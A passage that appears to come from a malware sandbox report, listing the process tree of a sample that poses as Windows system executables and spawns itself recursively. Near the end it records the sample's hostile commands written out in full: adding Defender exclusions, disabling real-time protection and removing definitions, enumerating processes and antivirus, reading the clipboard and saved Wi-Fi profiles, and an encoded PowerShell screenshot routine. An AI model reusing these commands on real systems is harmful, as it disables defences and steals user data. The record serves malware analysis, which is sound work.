"C:\Users\Admin\Windows Service Wrapper.exe"
45⤵
PID:6380

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
45⤵
PID:2084

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
46⤵
PID:4336

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
44⤵
PID:6784

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
44⤵
PID:5644

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
44⤵
PID:5240

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
45⤵
PID:4728

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
43⤵
PID:1948

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
43⤵
PID:1364

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
43⤵
PID:2988

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
44⤵
PID:6520

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
42⤵
PID:4704

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
42⤵
PID:1620

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
42⤵
PID:4828

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
43⤵
PID:780

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
41⤵
PID:2312

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
41⤵
PID:2276

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
41⤵
PID:3780

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
42⤵
PID:5388

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
40⤵
PID:4588

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
40⤵
PID:6424

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
40⤵
PID:6484

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
41⤵
PID:2680

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
39⤵
PID:4724

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
39⤵
PID:568

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
39⤵
PID:2532

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
40⤵
PID:4544

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
38⤵
PID:3680

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
38⤵
PID:952

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
38⤵
PID:5168

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
39⤵
PID:5652

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
37⤵
PID:1468

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
37⤵
PID:6348

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
37⤵
PID:3000

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
38⤵
PID:2496

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
36⤵
PID:2844

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
36⤵
PID:4024

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
36⤵
PID:3744

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
37⤵
PID:7104

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
35⤵
PID:5244

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
35⤵
PID:4544

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
35⤵
PID:5904

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
36⤵
PID:4296

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
34⤵
PID:5708

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
34⤵
PID:6404

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
34⤵
PID:5132

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
35⤵
PID:5956

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
33⤵
PID:2888

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
33⤵
PID:6996

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
33⤵
PID:6632

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
34⤵
PID:4052

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
32⤵
PID:3284

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
32⤵
PID:5960

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
32⤵
PID:5488

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
33⤵
PID:3572

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
31⤵
PID:1612

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
31⤵
PID:4104

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
31⤵
PID:3316

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
32⤵
PID:6580

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
30⤵
PID:6312

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
30⤵
PID:5956

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
30⤵
PID:5232

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
31⤵
PID:2224

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
29⤵
PID:5868

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
29⤵
PID:4036

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
29⤵
PID:6940

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
30⤵
PID:6988

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
28⤵
PID:6420

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
28⤵
PID:5372

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
28⤵
PID:5904

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
29⤵
PID:7116

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
27⤵
PID:7088

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
27⤵
PID:6168

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
27⤵
PID:7052

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
28⤵
PID:5532

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
26⤵
PID:340

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
26⤵
PID:5388

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
26⤵
PID:2960

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
27⤵
PID:5684

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
25⤵
PID:384

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
25⤵
PID:6064

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
25⤵
PID:6168

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
26⤵
PID:432

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
24⤵
PID:3040

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
24⤵
PID:5336

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
24⤵
PID:5788

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
25⤵
PID:3772

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
23⤵
PID:1548

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
23⤵
PID:4928

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
23⤵
PID:2860

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
24⤵
PID:5388

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
22⤵
PID:1488

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
22⤵
PID:6184

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
22⤵
PID:6232

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
23⤵
PID:5644

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
21⤵
PID:6040

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
21⤵
PID:4900

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
21⤵
PID:1816

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
22⤵
PID:5848

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
20⤵
PID:4084

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
20⤵
PID:5084

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
20⤵
PID:5136

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
21⤵
PID:4380

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
19⤵
PID:1580

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
19⤵
PID:1508

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
19⤵
PID:2244

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
20⤵
PID:1792

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
18⤵
PID:6672

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
18⤵
PID:7132

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
18⤵
PID:460

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
19⤵
PID:5108

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
17⤵
PID:3092

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
17⤵
PID:4912

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
17⤵
PID:6168

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
18⤵
PID:2532

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
16⤵
PID:6204

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
16⤵
PID:6916

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
16⤵
PID:4104

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
17⤵
PID:3200

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
15⤵
PID:6164

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
15⤵
PID:5092

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
15⤵
PID:4988

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
16⤵
PID:4692

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
14⤵
PID:5160

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
14⤵
PID:3456

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
14⤵
PID:4928

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
15⤵
PID:4968

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
13⤵
PID:5848

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
13⤵
PID:7132

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
13⤵
PID:3284

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
14⤵
PID:5636

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
12⤵
PID:6712

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6712 -s 1300
13⤵
PID:2852

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
12⤵
PID:6728

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
12⤵
PID:6040

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
13⤵
PID:6252

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
11⤵
PID:5324

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
11⤵
PID:1488

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
11⤵
PID:5356

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
12⤵
PID:5296

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
10⤵
PID:6696

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
10⤵
PID:7056

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
10⤵
PID:5952

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
11⤵
PID:1156

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
9⤵
PID:6568

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
9⤵
PID:6576

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
9⤵
PID:6584

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
10⤵
PID:7020

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
8⤵
PID:5652

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
8⤵
PID:5592

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
8⤵
PID:6020

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
9⤵
PID:6228

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
7⤵
- Executes dropped EXE
PID:2532

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
7⤵
- Executes dropped EXE
PID:1488

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
7⤵
- Executes dropped EXE
PID:1292

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
8⤵
- Executes dropped EXE
PID:5492

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2852

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4396

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
6⤵
- Executes dropped EXE
PID:4524

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:72

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4124

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4560

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3416

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1156

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5084

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4840

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1592

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1260

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3748

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3316

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5000

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Windows SmartScreen.exe'"
5⤵
PID:1948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Windows SmartScreen.exe'
6⤵
PID:5676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
5⤵
PID:3412

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:1500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
5⤵
PID:1896

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
6⤵
PID:5736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
5⤵
PID:2992

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
6⤵
- Enumerates processes with tasklist
PID:4636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
5⤵
PID:2864

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
6⤵
- Enumerates processes with tasklist
PID:1044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
5⤵
PID:1016

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
6⤵
PID:5904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
5⤵
PID:5056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
6⤵
PID:5568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
5⤵
PID:644

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
6⤵
- Enumerates processes with tasklist
PID:5628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
5⤵
PID:384

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:1020

C:\Windows\system32\tree.com
tree /A /F
6⤵
PID:2536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
5⤵
PID:2180

C:\Windows\system32\netsh.exe
netsh wlan show profile
6⤵
PID:6036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
5⤵
PID:712

C:\Windows\system32\systeminfo.exe
systeminfo
6⤵
- Gathers system information
PID:5488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
5⤵
PID:3416

C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
6⤵
PID:5920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAA